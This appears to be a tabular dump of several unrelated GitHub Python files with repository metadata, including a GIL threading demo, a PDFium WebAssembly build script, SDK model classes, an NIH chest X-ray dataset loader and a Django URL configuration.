blob_id (string, len 40) | directory_id (string, len 40) | path (string, len 3-616) | content_id (string, len 40) | detected_licenses (list, len 0-112) | license_type (string, 2 classes) | repo_name (string, len 5-115) | snapshot_id (string, len 40) | revision_id (string, len 40) | branch_name (string, 777 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 to 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 to 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 to 2023-09-06 01:08:06) | github_id (int64, 4.92k to 681M, nullable) | star_events_count (int64, 0 to 209k) | fork_events_count (int64, 0 to 110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 to 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 to 2023-08-21 12:35:19, nullable) | gha_language (string, 149 classes) | src_encoding (string, 26 classes) | language (string, 1 value) | is_vendor (bool, 2 classes) | is_generated (bool, 2 classes) | length_bytes (int64, 3 to 10.2M) | extension (string, 188 classes) | content (string, len 3-10.2M) | authors (list, len 1) | author_id (string, len 1-132)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1bb77fc8dacaeb560a91eefb770e6455bfb58186 | add0bb7a309ea346614d7f560a24e653d3d0ff67 | /Python多线程/多线程.py | 141bbbb34bec2b4895f11d7847ae4c8244b89526 | []
| no_license | 1572903465/PythonProjects | 935aff08d5b3d3f146393764a856369061513d36 | 73576080174f72ea1df9b36d201cf3949419041b | refs/heads/master | 2023-06-10T15:50:49.178112 | 2021-07-05T15:42:53 | 2021-07-05T15:42:53 | 301,328,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 801 | py | import time
import threading
#The GIL is a mechanism the interpreter uses to synchronize threads
#It ensures that only one thread is executing at any moment (even on a multi-core processor)
#An interpreter that uses a GIL allows only one thread to run at a time
#Common interpreters that use a GIL are CPython and Ruby MRI
#If you use Jython, there is no GIL lock
#CPU-bound multithreading demo
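#Because of the GIL, the ten threads started below run this CPU-bound loop
#essentially one at a time, so the elapsed time printed at the end stays close
#to the single-threaded time. A process pool is the usual fix; a minimal
#sketch (hedged, reusing the same start() function):
#    from multiprocessing import Pool
#    with Pool(10) as pool:
#        pool.starmap(start, [()] * 10)  # runs start() in 10 worker processes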
def start():#pure computation that burns CPU time; no real-world purpose
data = 0
    for _ in range(10000000):#add 1 over and over
data += 1
return
if __name__ == "__main__":
time_data = time.time()
ts = {}
for i in range(10):
        t = threading.Thread(target = start)#pass the function object to target, without parentheses
t.start()
        ts[i] = t #a brand-new thread
for i in range(10):
ts[i].join()
print(time.time() - time_data) | [
"[email protected]"
]
| |
96bdcb9ba0731b60ceb0fa620043c197db1496da | c41432beb80d63d44aead4ae2cb747cafc3316a7 | /modules/wasm.py | 595545ffd82167cfb34979152d1b13f6379d6965 | [
"MIT"
]
| permissive | My6UoT9/pdfium-lib | 58fdbfbecb634ead0c9de430a1677374977525d2 | caf775c56ae0362a0b0cf478e18f607b9242a1e8 | refs/heads/master | 2023-02-26T07:31:36.984428 | 2021-02-02T05:20:27 | 2021-02-02T05:20:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,842 | py | import glob
import os
import tarfile
from subprocess import check_call
import modules.config as c
import modules.functions as f
def run_task_build_pdfium():
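    # Fetch the PDFium source with gclient into build/linux/pdfium, then pin
    # the checkout to the commit configured in c.pdfium_git_commit.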
f.debug("Building PDFium...")
target = "linux"
build_dir = os.path.join("build", target)
f.create_dir(build_dir)
target_dir = os.path.join(build_dir, "pdfium")
f.remove_dir(target_dir)
cwd = build_dir
command = " ".join(
[
"gclient",
"config",
"--unmanaged",
"https://pdfium.googlesource.com/pdfium.git",
]
)
check_call(command, cwd=cwd, shell=True)
cwd = build_dir
command = " ".join(["gclient", "sync"])
check_call(command, cwd=cwd, shell=True)
cwd = target_dir
command = " ".join(["git", "checkout", c.pdfium_git_commit])
check_call(command, cwd=cwd, shell=True)
def run_task_patch():
f.debug("Patching...")
source_dir = os.path.join("build", "linux", "pdfium")
# build config
source_file = os.path.join(
source_dir,
"build",
"build_config.h",
)
if f.file_line_has_content(
source_file,
201,
"#error Please add support for your architecture in build/build_config.h\n",
):
f.replace_line_in_file(
source_file,
201,
"#define ARCH_CPU_X86_FAMILY 1\n#define ARCH_CPU_32_BITS 1\n#define ARCH_CPU_LITTLE_ENDIAN 1\n",
)
f.debug("Applied: build config")
else:
f.debug("Skipped: build config")
# compiler thin archive
source_file = os.path.join(
source_dir,
"build",
"config",
"BUILDCONFIG.gn",
)
if f.file_line_has_content(
source_file,
342,
' "//build/config/compiler:thin_archive",\n',
):
f.replace_line_in_file(
source_file,
342,
' #"//build/config/compiler:thin_archive",\n',
)
f.debug("Applied: compiler thin archive")
else:
f.debug("Skipped: compiler thin archive")
# build thin archive
source_file = os.path.join(
source_dir,
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
203,
' configs -= [ "//build/config/compiler:thin_archive" ]\n',
):
f.replace_line_in_file(
source_file,
203,
' #configs -= [ "//build/config/compiler:thin_archive" ]\n',
)
f.debug("Applied: build thin archive")
else:
f.debug("Skipped: build thin archive")
# compiler
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
768,
' "-m64",\n',
):
f.replace_line_in_file(
source_file,
768,
' #"-m64",\n',
)
f.replace_line_in_file(
source_file,
769,
' #"-march=$x64_arch",\n',
)
f.replace_line_in_file(
source_file,
770,
' #"-msse3",\n',
)
f.debug("Applied: compiler")
else:
f.debug("Skipped: compiler")
# pragma optimize
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
1541,
' "-Wno-ignored-pragma-optimize",\n',
):
f.replace_line_in_file(
source_file,
1541,
' "-Wno-deprecated-register",\n',
)
f.debug("Applied: pragma optimize")
else:
f.debug("Skipped: pragma optimize")
# pubnames
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
2358,
' cflags += [ "-ggnu-pubnames" ]\n',
):
f.replace_line_in_file(
source_file,
2358,
' #cflags += [ "-ggnu-pubnames" ]\n',
)
f.debug("Applied: pubnames")
else:
f.debug("Skipped: pubnames")
# gcc toolchain
source_file = os.path.join(
source_dir,
"build",
"toolchain",
"gcc_toolchain.gni",
)
if f.file_line_has_content(
source_file,
643,
' cc = "$prefix/clang"\n',
):
f.replace_line_in_file(
source_file,
643,
' cc = "emcc"\n',
)
f.replace_line_in_file(
source_file,
644,
' cxx = "em++"\n',
)
f.debug("Applied: gcc toolchain")
else:
f.debug("Skipped: gcc toolchain")
# partition allocator
source_file = os.path.join(
source_dir,
"third_party",
"base",
"allocator",
"partition_allocator",
"spin_lock.cc",
)
if f.file_line_has_content(
source_file,
54,
'#warning "Processor yield not supported on this architecture."\n',
):
f.replace_line_in_file(
source_file,
54,
'//#warning "Processor yield not supported on this architecture."\n',
)
f.debug("Applied: partition allocator")
else:
f.debug("Skipped: partition allocator")
# compiler stack protector
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
306,
' cflags += [ "-fstack-protector" ]\n',
):
f.replace_line_in_file(
source_file,
306,
' cflags += [ "-fno-stack-protector" ]\n',
)
f.debug("Applied: compiler stack protector")
else:
f.debug("Skipped: compiler stack protector")
# build pthread
source_file = os.path.join(
source_dir,
"build",
"config",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
236,
' "pthread",\n',
):
f.replace_line_in_file(
source_file,
236,
' #"pthread",\n',
)
f.debug("Applied: build pthread")
else:
f.debug("Skipped: build pthread")
# compiler pthread
source_file = os.path.join(
source_dir,
"build",
"config",
"compiler",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
465,
' cflags += [ "-pthread" ]\n',
):
f.replace_line_in_file(
source_file,
465,
' #cflags += [ "-pthread" ]\n',
)
f.debug("Applied: compiler pthread")
else:
f.debug("Skipped: compiler pthread")
# skia pthread
source_file = os.path.join(
source_dir,
"third_party",
"skia",
"gn",
"BUILD.gn",
)
if f.file_line_has_content(
source_file,
231,
' libs += [ "pthread" ]\n',
):
f.replace_line_in_file(
source_file,
231,
' #libs += [ "pthread" ]\n',
)
f.debug("Applied: skia pthread")
else:
f.debug("Skipped: skia pthread")
# copy files required
f.debug("Copying required files...")
linux_dir = os.path.join(source_dir, "linux")
f.create_dir(linux_dir)
f.copy_file("/usr/include/jpeglib.h", os.path.join(source_dir, "jpeglib.h"))
f.copy_file("/usr/include/jmorecfg.h", os.path.join(source_dir, "jmorecfg.h"))
f.copy_file("/usr/include/zlib.h", os.path.join(source_dir, "zlib.h"))
f.copy_file("/usr/include/zconf.h", os.path.join(source_dir, "zconf.h"))
f.copy_file("/usr/include/jerror.h", os.path.join(source_dir, "jerror.h"))
f.copy_file(
"/usr/include/x86_64-linux-gnu/jconfig.h", os.path.join(source_dir, "jconfig.h")
)
f.copy_file("/usr/include/linux/limits.h", os.path.join(linux_dir, "limits.h"))
f.debug("Copied!")
def run_task_build():
f.debug("Building libraries...")
current_dir = os.getcwd()
# configs
for config in c.configurations_wasm:
# targets
for target in c.targets_wasm:
main_dir = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
)
f.remove_dir(main_dir)
f.create_dir(main_dir)
os.chdir(
os.path.join(
"build",
target["target_os"],
"pdfium",
)
)
# generating files...
f.debug(
'Generating files to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
arg_is_debug = "true" if config == "debug" else "false"
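            # GN args: build one self-contained static libpdfium.a without
            # V8/XFA/Skia, using the system zlib and libjpeg (suitable for the
            # Emscripten toolchain patched in above).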
args = []
args.append('target_os="{0}"'.format(target["pdfium_os"]))
args.append('target_cpu="{0}"'.format(target["target_cpu"]))
args.append("use_goma=false")
args.append("is_debug={0}".format(arg_is_debug))
args.append("pdf_use_skia=false")
args.append("pdf_use_skia_paths=false")
args.append("pdf_enable_xfa=false")
args.append("pdf_enable_v8=false")
args.append("is_component_build=false")
args.append("clang_use_chrome_plugins=false")
args.append("pdf_is_standalone=true")
args.append("use_debug_fission=false")
args.append("use_custom_libcxx=false")
args.append("use_sysroot=false")
args.append("use_system_libjpeg=true")
args.append("use_system_zlib=true")
args.append("pdf_is_complete_lib=true")
if config == "release":
args.append("symbol_level=0")
args_str = " ".join(args)
command = " ".join(
[
"gn",
"gen",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"--args='{0}'".format(args_str),
]
)
check_call(command, shell=True)
# compiling...
f.debug(
'Compiling to arch "{0}" and configuration "{1}"...'.format(
target["target_cpu"], config
)
)
command = " ".join(
[
"ninja",
"-C",
"out/{0}-{1}-{2}".format(
target["target_os"], target["target_cpu"], config
),
"pdfium",
"-v",
]
)
check_call(command, shell=True)
os.chdir(current_dir)
def run_task_install():
f.debug("Installing libraries...")
# configs
for config in c.configurations_wasm:
for target in c.targets_wasm:
f.remove_dir(
os.path.join("build", target["target_os"], target["target_cpu"], config)
)
f.create_dir(
os.path.join("build", target["target_os"], target["target_cpu"], config)
)
f.create_dir(
os.path.join(
"build", target["target_os"], target["target_cpu"], config, "lib"
)
)
source_lib_path = os.path.join(
"build",
target["target_os"],
"pdfium",
"out",
"{0}-{1}-{2}".format(target["target_os"], target["target_cpu"], config),
"obj",
"libpdfium.a",
)
target_lib_path = os.path.join(
"build",
target["target_os"],
target["target_cpu"],
config,
"lib",
"libpdfium.a",
)
f.copy_file(source_lib_path, target_lib_path)
# check file
f.debug("File data...")
command = " ".join(["file", target_lib_path])
check_call(command, shell=True)
f.debug("File size...")
command = " ".join(["ls", "-lh ", target_lib_path])
check_call(command, shell=True)
# include
include_dir = os.path.join("build", "linux", "pdfium", "public")
target_include_dir = os.path.join(
"build", target["target_os"], target["target_cpu"], config, "include"
)
f.remove_dir(target_include_dir)
f.create_dir(target_include_dir)
for basename in os.listdir(include_dir):
if basename.endswith(".h"):
pathname = os.path.join(include_dir, basename)
if os.path.isfile(pathname):
f.copy_file2(pathname, target_include_dir)
def run_task_test():
f.debug("Testing...")
current_dir = os.getcwd()
sample_dir = os.path.join(current_dir, "sample-wasm")
build_dir = os.path.join(sample_dir, "build")
http_dir = os.path.join("sample-wasm", "build")
for config in c.configurations_wasm:
for target in c.targets_wasm:
lib_file_out = os.path.join(
current_dir,
"build",
target["target_os"],
target["target_cpu"],
config,
"lib",
"libpdfium.a",
)
include_dir = os.path.join(
current_dir,
"build",
target["target_os"],
target["target_cpu"],
config,
"include",
)
f.remove_dir(build_dir)
f.create_dir(build_dir)
# build
command = " ".join(
[
"em++",
"-o",
"build/index.html",
"src/main.cpp",
lib_file_out,
"-I{0}".format(include_dir),
"-s",
"DEMANGLE_SUPPORT=1",
"-s",
"USE_ZLIB=1",
"-s",
"USE_LIBJPEG=1",
"-s",
"WASM=1",
"-s",
"ASSERTIONS=1",
"-s",
"ALLOW_MEMORY_GROWTH=1",
"--embed-file",
"assets/web-assembly.pdf",
]
)
check_call(command, cwd=sample_dir, shell=True)
f.debug(
"Test on browser with: python -m http.server --directory {0}".format(
http_dir
)
)
def run_task_generate():
f.debug("Generating...")
current_dir = os.getcwd()
for config in c.configurations_wasm:
for target in c.targets_wasm:
# paths
utils_dir = os.path.join(current_dir, "extras", "wasm", "utils")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
relative_dir = os.path.join(
"build",
target["target_os"],
target["target_cpu"],
)
root_dir = os.path.join(current_dir, relative_dir)
main_dir = os.path.join(root_dir, config)
lib_dir = os.path.join(main_dir, "lib")
include_dir = os.path.join(main_dir, "include")
gen_dir = os.path.join(root_dir, "gen")
node_dir = os.path.join(main_dir, "node")
http_dir = os.path.join(relative_dir, config, "node")
f.remove_dir(gen_dir)
f.create_dir(gen_dir)
# doxygen
f.debug("Doxygen...")
doxygen_file = os.path.join(
current_dir,
"extras",
"wasm",
"doxygen",
"Doxyfile",
)
command = " ".join(
[
"doxygen",
doxygen_file,
]
)
check_call(command, cwd=include_dir, shell=True)
# copy xml files
f.debug("Copying xml files...")
xml_dir = os.path.join(include_dir, "xml")
f.copy_dir(xml_dir, os.path.join(gen_dir, "xml"))
f.remove_dir(xml_dir)
# copy utils files
f.debug("Copying utils files...")
f.copy_dir(utils_dir, os.path.join(gen_dir, "utils"))
# prepare files
f.debug("Preparing files...")
rsp_file = os.path.join(gen_dir, "utils", "pdfium.rsp")
f.replace_in_file(rsp_file, "{LIB_DIR}", lib_dir)
f.replace_in_file(rsp_file, "{INCLUDE_DIR}", include_dir)
# node modules
f.debug("Installing node modules...")
gen_utils_dir = os.path.join(
gen_dir,
"utils",
)
command = " ".join(
[
"npm",
"install",
]
)
check_call(command, cwd=gen_utils_dir, shell=True)
# generate
f.debug("Compiling with emscripten...")
gen_out_dir = os.path.join(
gen_dir,
"out",
)
f.remove_dir(gen_out_dir)
f.create_dir(gen_out_dir)
html_file = os.path.join(
gen_out_dir,
"pdfium.html",
)
command = " ".join(
[
"emcc",
"-o",
html_file,
"-s",
'EXPORTED_FUNCTIONS="$(node function-names ../xml/index.xml)"',
"-s",
'EXTRA_EXPORTED_RUNTIME_METHODS=\'["ccall", "cwrap"]\'',
"custom.c",
"@pdfium.rsp",
"-Os",
"--no-entry",
]
)
check_call(command, cwd=gen_utils_dir, shell=True)
# copy files
f.debug("Copying compiled files...")
f.remove_dir(node_dir)
f.copy_dir(gen_out_dir, node_dir)
# copy template files
f.debug("Copying template files...")
f.copy_file(
os.path.join(template_dir, "index.html"),
os.path.join(node_dir, "index.html"),
)
# test
f.debug(
"Test on browser with: python -m http.server --directory {0}".format(
http_dir
)
)
f.debug("Generated")
def run_task_publish():
f.debug("Publishing...")
current_dir = os.getcwd()
publish_dir = os.path.join(current_dir, "build", "linux", "publish")
node_dir = os.path.join(current_dir, "build", "linux", "x64", "release", "node")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
# copy generated files
f.remove_dir(publish_dir)
f.copy_dir(node_dir, publish_dir)
# copy template files
f.copy_file(
os.path.join(template_dir, "README.md"),
os.path.join(publish_dir, "README.md"),
)
# finish
f.debug("Test on browser with: https://paulo-coutinho.github.io/pdfium-lib/")
f.debug("Published")
def run_task_publish_to_web():
f.debug("Publishing...")
current_dir = os.getcwd()
publish_dir = os.path.join(current_dir, "build", "linux", "publish")
node_dir = os.path.join(current_dir, "build", "linux", "x64", "release", "node")
template_dir = os.path.join(current_dir, "extras", "wasm", "template")
# copy generated files
f.remove_dir(publish_dir)
f.copy_dir(node_dir, publish_dir)
# copy template files
f.copy_file(
os.path.join(template_dir, "README.md"),
os.path.join(publish_dir, "README.md"),
)
# clone gh-pages branch
command = "git init ."
check_call(command, cwd=publish_dir, shell=True)
command = "git add ."
check_call(command, cwd=publish_dir, shell=True)
command = 'git commit -m "new version published"'
check_call(command, cwd=publish_dir, shell=True)
command = 'git push "[email protected]:pdfviewer/pdfviewer.github.io.git" master:master --force'
check_call(command, cwd=publish_dir, shell=True)
# finish
f.debug("Test on browser with: https://pdfviewer.github.io/")
f.debug("Published")
def run_task_archive():
f.debug("Archiving...")
current_dir = os.getcwd()
output_filename = os.path.join(current_dir, "wasm.tgz")
tar = tarfile.open(output_filename, "w:gz")
for config in c.configurations_wasm:
for target in c.targets_wasm:
lib_dir = os.path.join(
current_dir, "build", target["target_os"], target["target_cpu"], config
)
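            # Archive the whole per-config directory; the filter drops members
            # whose names contain "_" unless they end in ".h" (keeps headers).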
tar.add(
name=lib_dir,
arcname=os.path.basename(lib_dir),
filter=lambda x: (
None if "_" in x.name and not x.name.endswith(".h") else x
),
)
tar.close()
| [
"[email protected]"
]
| |
8a9f2c084e5fbff4425c903743db38ff3e08f6e7 | e7d1e06b5686f87280db292863b34ce0ea530d94 | /src/examples/func_local.py | 151515b33e59143e74c36eb6b6361a128c4ad393 | []
| no_license | tobereborn/byte-of-python2 | 4e9abdb3c513f8b5aa3955873b7468ddb60c8883 | c7e06be6f246dc6292780d59de0806b19c086943 | refs/heads/master | 2021-01-12T04:25:00.536489 | 2017-02-07T02:06:23 | 2017-02-07T02:06:23 | 77,606,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 213 | py | #!/usr/bin/python
# -*- coding:utf-8 -*-
'''
Created on Dec 31, 2016
@author: weizhen
'''
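# Scope demo: rebinding x inside func only changes the function-local x,
# leaving the module-level x untouched.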
def func(x):
print 'Local x is', x
x = 2
print 'Change local x to', x
x = 50
func(x)
print 'x is still', x
| [
"none"
]
| none |
f04925d7a0bf63c4b38d98c0cb08f71f17cc7b9c | 347699fbc16144e45ec9ffb4fbdb01e19cc69329 | /cough2.py | 0187d44d66b5d0a074e7763a7e4e9445b57ae747 | []
| no_license | kevindsteeleii/CS50-Python_Intro_to_CS | e7793f82d0530cd2f22f5b9fae1af0afd9b9ab36 | 6dea7245a27fe540ec9aa2fc878e7b876c4533ef | refs/heads/master | 2020-04-20T14:15:06.223633 | 2019-02-03T00:36:15 | 2019-02-03T00:36:15 | 168,892,517 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 101 | py | # has no special name
def main():
cough()
def cough():
print(3* "cough\n")
main()
# cough() | [
"github email address"
]
| github email address |
5725565c8233d54c532088ebda905dca10d51e65 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-servicestage/huaweicloudsdkservicestage/v2/model/create_o_auth_request.py | 6759129234f47c48a4eb8652297aba7bde7df202 | [
"Apache-2.0"
]
| permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,107 | py | # coding: utf-8
import re
import six
class CreateOAuthRequest:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'repo_type': 'str',
'tag': 'str',
'body': 'OAuth'
}
attribute_map = {
'repo_type': 'repo_type',
'tag': 'tag',
'body': 'body'
}
def __init__(self, repo_type=None, tag=None, body=None):
"""CreateOAuthRequest - a model defined in huaweicloud sdk"""
self._repo_type = None
self._tag = None
self._body = None
self.discriminator = None
self.repo_type = repo_type
if tag is not None:
self.tag = tag
if body is not None:
self.body = body
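    # A hedged usage sketch (argument values are illustrative, taken from the
    # docstrings below, not from the SDK documentation):
    #   request = CreateOAuthRequest(repo_type="github", tag="intl", body=OAuth(...))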
@property
def repo_type(self):
"""Gets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:return: The repo_type of this CreateOAuthRequest.
:rtype: str
"""
return self._repo_type
@repo_type.setter
def repo_type(self, repo_type):
"""Sets the repo_type of this CreateOAuthRequest.
仓库类型。 支持OAuth授权的仓库类型有:github、gitlab、gitee、bitbucket。
:param repo_type: The repo_type of this CreateOAuthRequest.
:type: str
"""
self._repo_type = repo_type
@property
def tag(self):
"""Gets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:return: The tag of this CreateOAuthRequest.
:rtype: str
"""
return self._tag
@tag.setter
def tag(self, tag):
"""Sets the tag of this CreateOAuthRequest.
站点标签。 比如国际站的,?tag=intl。 默认为空。
:param tag: The tag of this CreateOAuthRequest.
:type: str
"""
self._tag = tag
@property
def body(self):
"""Gets the body of this CreateOAuthRequest.
:return: The body of this CreateOAuthRequest.
:rtype: OAuth
"""
return self._body
@body.setter
def body(self, body):
"""Sets the body of this CreateOAuthRequest.
:param body: The body of this CreateOAuthRequest.
:type: OAuth
"""
self._body = body
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, CreateOAuthRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
e216c2feeb68eba1c8976b72040c3a84d2b3c578 | e2ba1e3d001902e50f1dc9a63baf2a8abcac3ed8 | /InnerEye-DataQuality/InnerEyeDataQuality/datasets/nih_cxr.py | 91776355375965f599295af3453238326df7cff1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | RobinMarshall55/InnerEye-DeepLearning | 81f52e7429f942e8c9845958d5b586e19e14e351 | 8495a2eec3903957e3e81f81a0d2ad842d41dfe2 | refs/heads/main | 2023-08-15T19:46:38.017713 | 2021-10-22T14:13:56 | 2021-10-22T14:13:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,929 | py | # ------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# ------------------------------------------------------------------------------------------
import logging
from pathlib import Path
from typing import Callable, List, Optional, Tuple, Dict, Union
import PIL
from PIL import Image
from torch.utils.data import Dataset
import numpy as np
import pandas as pd
NIH_TOTAL_SIZE = 112120
class NIHCXR(Dataset):
def __init__(self,
data_directory: str,
use_training_split: bool,
seed: int = 1234,
shuffle: bool = True,
transform: Optional[Callable] = None,
num_samples: int = None,
return_index: bool = True) -> None:
"""
Class for the full NIH ChestXray Dataset (112k images)
:param data_directory: the directory containing all training images from the dataset as well as the
Data_Entry_2017.csv file containing the dataset labels.
:param use_training_split: whether to return the training or the test split of the dataset.
:param seed: random seed to use for dataset creation
:param shuffle: whether to shuffle the dataset prior to spliting between validation and training
:param transform: a preprocessing function that takes a PIL image as input and returns a tensor
:param num_samples: number of the samples to return (has to been smaller than the dataset split)
"""
self.data_directory = Path(data_directory)
if not self.data_directory.exists():
logging.error(
f"The data directory {self.data_directory} does not exist. Make sure to download the NIH data "
f"first.The dataset can on the main page"
"https://www.kaggle.com/nih-chest-xrays/data. Make sure all images are placed directly under the "
"data_directory folder. Make sure you downloaded the Data_Entry_2017.csv file to this directory as"
"well.")
self.train = use_training_split
self.seed = seed
self.random_state = np.random.RandomState(seed)
self.dataset_dataframe = pd.read_csv(self.data_directory / "Data_Entry_2017.csv")
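        # Binary target: an image counts as positive if its finding labels
        # include pneumonia, infiltration, or consolidation.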
self.dataset_dataframe["pneumonia_like"] = self.dataset_dataframe["Finding Labels"].apply(
lambda x: x.split("|")).apply(lambda x: "pneumonia" in x.lower()
or "infiltration" in x.lower()
or "consolidation" in x.lower())
self.transforms = transform
orig_labels = self.dataset_dataframe.pneumonia_like.values.astype(np.int64)
subjects_ids = self.dataset_dataframe["Image Index"].values
is_train_ids = self.dataset_dataframe["train"].values
self.num_classes = 2
self.indices = np.where(is_train_ids)[0] if use_training_split else np.where(~is_train_ids)[0]
self.indices = self.random_state.permutation(self.indices) \
if shuffle else self.indices
# ------------- Select subset of current split ------------- #
if num_samples is not None:
assert 0 < num_samples <= len(self.indices)
self.indices = self.indices[:num_samples]
self.subject_ids = subjects_ids[self.indices]
self.orig_labels = orig_labels[self.indices].reshape(-1)
self.targets = self.orig_labels
# Identify case ids for ambiguous and clear label noise cases
self.ambiguity_metric_args: Dict = dict()
dataset_type = "TRAIN" if use_training_split else "VAL"
logging.info(f"Proportion of positive labels - {dataset_type}: {np.mean(self.targets)}")
logging.info(f"Number samples - {dataset_type}: {self.targets.shape[0]}")
self.return_index = return_index
def __getitem__(self, index: int) -> Union[Tuple[int, PIL.Image.Image, int], Tuple[PIL.Image.Image, int]]:
"""
:param index: The index of the sample to be fetched
:return: The image and label tensors
"""
subject_id = self.subject_ids[index]
filename = self.data_directory / f"{subject_id}"
target = self.targets[index]
scan_image = Image.open(filename).convert("L")
if self.transforms is not None:
scan_image = self.transforms(scan_image)
if self.return_index:
return index, scan_image, int(target)
return scan_image, int(target)
def __len__(self) -> int:
"""
:return: The size of the dataset
"""
return len(self.indices)
def get_label_names(self) -> List[str]:
return ["NotPneunomiaLike", "PneunomiaLike"]
| [
"[email protected]"
]
| |
a9adbd9757605899cfcc24ab62f85a0506576082 | 9923e30eb99716bfc179ba2bb789dcddc28f45e6 | /apimatic/python_generic_lib/Samsara+API-Python/samsaraapi/models/tag_1.py | c430f1f458ea4d2ca686481440b43d895aaab5a2 | [
"MIT"
]
| permissive | silverspace/samsara-sdks | cefcd61458ed3c3753ac5e6bf767229dd8df9485 | c054b91e488ab4266f3b3874e9b8e1c9e2d4d5fa | refs/heads/master | 2020-04-25T13:16:59.137551 | 2019-03-01T05:49:05 | 2019-03-01T05:49:05 | 172,804,041 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | # -*- coding: utf-8 -*-
"""
samsaraapi
This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
"""
class Tag1(object):
"""Implementation of the 'Tag1' model.
TODO: type model description here.
Attributes:
id (long|int): The ID of this tag.
name (string): Name of this tag.
parent_tag_id (long|int): The ID of this tag.
"""
# Create a mapping from Model property names to API property names
_names = {
"id":'id',
"name":'name',
"parent_tag_id":'parentTagId'
}
def __init__(self,
id=None,
name=None,
parent_tag_id=None):
"""Constructor for the Tag1 class"""
# Initialize members of the class
self.id = id
self.name = name
self.parent_tag_id = parent_tag_id
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
id = dictionary.get('id')
name = dictionary.get('name')
parent_tag_id = dictionary.get('parentTagId')
# Return an object of this model
return cls(id,
name,
parent_tag_id)
| [
"[email protected]"
]
| |
d5a7791ef5d1a16c2f4cfdbc78846c44437f2ad5 | 33327721233dbab4f95226aca5ebf52ec5782ae3 | /ModelInheritance/urls.py | 184bf47cbd9fed6d95c6e1cf7d0f6a88f774f9c9 | []
| no_license | priyankaonly1/ModelInheritance | 0b45e515cb1f9751f76b9639d1aab78369a861f9 | 078dfd24428c8f64ab66da421a1e4afc94b5c14c | refs/heads/main | 2023-07-05T11:55:17.489648 | 2021-09-03T18:56:22 | 2021-09-03T18:56:22 | 402,871,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 809 | py | """ModelInheritance URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
from school import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home),
]
| [
"[email protected]"
]
| |
